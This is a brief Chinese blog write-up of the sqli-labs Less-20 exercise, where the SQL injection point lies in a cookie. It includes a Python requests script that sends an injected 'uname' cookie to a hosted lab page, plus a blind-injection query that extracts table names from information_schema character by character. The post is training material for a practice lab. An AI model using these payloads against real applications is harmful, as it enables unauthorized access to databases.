Less-20

注入点在cookie 里面

python脚本搞定盲注

# encoding utf-8
# r 1151 e 1079
import requests as req
cookie="uname=admin' and 1=1#"
header={
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'",
    "Cookie":cookie,
}
url='https://sql.alienwares.top/Less-20/index.php'
res=req.get(url,headers=header)
#print(len(res.content))
if('../images/slap1.jpg' in res.content.decode('utf-8')):
    print('error')
else:
    print('succes')

View Code

sql语句

select mid((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),1,1)='e'

View Code

py可参考之前的wp

posted @ 2021-01-14 13:02 PointerK 阅读(32) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

PointerK

Less-20

注入点在cookie 里面

公告